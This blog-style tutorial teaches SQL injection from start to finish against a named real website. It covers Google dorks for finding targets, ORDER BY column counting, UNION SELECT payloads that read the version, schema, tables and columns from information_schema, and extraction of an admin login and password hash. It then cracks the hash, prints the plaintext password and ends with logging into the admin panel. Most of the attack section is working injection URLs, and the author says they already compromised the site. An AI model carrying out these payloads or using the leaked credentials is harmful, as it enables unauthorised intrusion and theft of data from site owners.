First of all you need to find a website which is vulnerable to sql injection attack.To find this we need dorks,dorks are code to find vulnerable webs..Just google them and you will find lots of webs which are vulnerable to sqli.I had posted many dorks just look my previous post,some dorks is given bellow
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
Just google them you will find some links,but all links are not vulnerable to sqli..
To find out if the link is vulnerable to sqli or not you have to put ' at the end of the link...
If some thing like this comes to your screen then web is vulnerable to sql injection attack...
Error : You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
I have chose a page,screen shot is given bellow
http://www.elmtreeproject.net/event.php?id=11.The web is already hack by me see my fb wall.
The screenshot of the web is
Now,for checking if this web is vulnerable to sql injection or not i will put ' in the end the link will look like
http://www.elmtreeproject.net/event.php?id=11'
The page shows sql error which means web is vulneable ti sqli...
Now , we have to find column number.The data is store in coloums on webs...
To find column number put - after id= and in the end put order by 20-- after the link
you have to put differnet number after order by like 12-- or 10-- or 9--.
If error comes on 20 then put 15 if error do not come on 15 puts 17 if error again come put 16 if error does not come it means coloumn number is 16.because error comes on 17 and does not come on 16...
http://site.com/news/view.php?id=828 order by 1-- (page loads normal)
http://site.com/news/view.php?id=828 order by 2-- (page loads normal)
http://site.com/news/view.php?id=828 order by 3-- (page loads normal)
http://site.com/news/view.php?id=828 order by 4-- (page loads normal)
http://site.com/news/view.php?id=828 order by 5-- (page loads normal)
http://site.com/news/view.php?id=828 order by 6-- (page loads normal)
http://site.com/news/view.php?id=828 order by 7-- (page loads normal)
http://site.com/news/view.php?id=828 order by 8-- (page loads normal)
http://site.com/news/view.php?id=828 order by 9-- (error)In above chart
it means columns no is 8.error on 9 and page loads normal on 8.
So, for our site now we find its column no........
I will put 10 in the end my link will become
http://www.elmtreeproject.net/event.php?id=-11 order by 10--
Their is error on page means column no is less than 10...Screenshot
http://www.elmtreeproject.net/event.php?id=-11 order by 9--
But again error comes now i will put 8-- and this time no error comes page loads normal.So the web i am hacking its column no is 8..
So we have find the column no.Now, we put
union select after the id=-11 and then all the numbers upto column no separated by comma (,)and in the end --.Our link will look like http://www.elmtreeproject.net/event.php?id=-11 union select 1,2,3,4,5,6,7, 8--Then it will show some number,which is the no of the column which are vulnerable.Screenshot
Now we will find data base version.For this just erase the number in the link,which you see on the screen at replace it with @@version.If data base version is gerater than 5 your work is easy..I got 3,5 as vulnerable so i replaced 5 with @@version,do try with all column no.My link become after adding @@version..http://www.elmtreeproject.net/event.php?id=-11 union select 1,2,3,4,@@version,6,7,8-- 
My data base version is 5.0.77.Now we will find data base.for this make link like this http://www.elmtreeproject.net/event.php?id=-11+union+select 1,2,3,4,group_concat(schema_name),6,7,8 from+information_schema.schemata--I have replace @@version with group_concat(schema_name) and in the end i have entered from+information_schema.schemata--.Be careful We are all doing this on vulnerable column as we find your is 5.Screen shot
Now we will find data base name.For this replacegroup_concat(schema_name) by database() and erase every thing after column no.My link becomes
http://www.elmtreeproject.net/event.php?id=-11+union+select 1,2,3,4,database(),6,7,8
And you will see the name of data base.
group_concat(table_name) and in the end add from information_schema.tables where table_schema=database()--.My link become http://www.elmtreeproject.net/event.php?id=-11+union+select 1,2,3,4,group_concat(table_name),6,7,8 from information_schema.tables where table_schema=database()--
Table name will be displayed where information is saved..
Find some thing like user or admin where you think password and user name of web is saved in our web (user) can be a table where pass is saved.So for knowing what is inside in all table change link as
http://www.elmtreeproject.net/event.php?id=-11+union+select 1,2,3,4,group_concat(column_name),6,7,8 from information_schema.tables where table_schema=database()--change group_concat(table_name) by group_concat(column_name).Find some thing like pass , password and user_name or any thing where password and user name can be saved.screen shot
In my web i found password and loin.So now find what is in password and login which is the username and pass of the web.change the link ashttp://www.elmtreeproject.net/event.php?id=-11+union+select 1,2,3,4,group_concat(login,0x3a,password,0x3a),6,7,8 from user--user is the name of the table we find above.In user login and password is hidden.You use your table name in the end.screen shot
WOw we find the pass and user name.The pass is in hash so, we have to convert it in text..our user name is markpassword in hash is 6c8c73ee9e41867a2cd358cd15fb5964.goto www.passcracking.com and convert it.
After cracking hashpass:SAADI 
Now , just go to the admin page and enter the user name and pass you will be enter as admin..enjoy
Finding a admin page is not a hard job i will tell you in other tut...just google it the web name with admin page you will find it.our is
http://www.elmtreeproject.net/
Enter pass and user name we found...
Yes We Enter to the Site
Now Do Any Thing What U Want With this
Post a Comment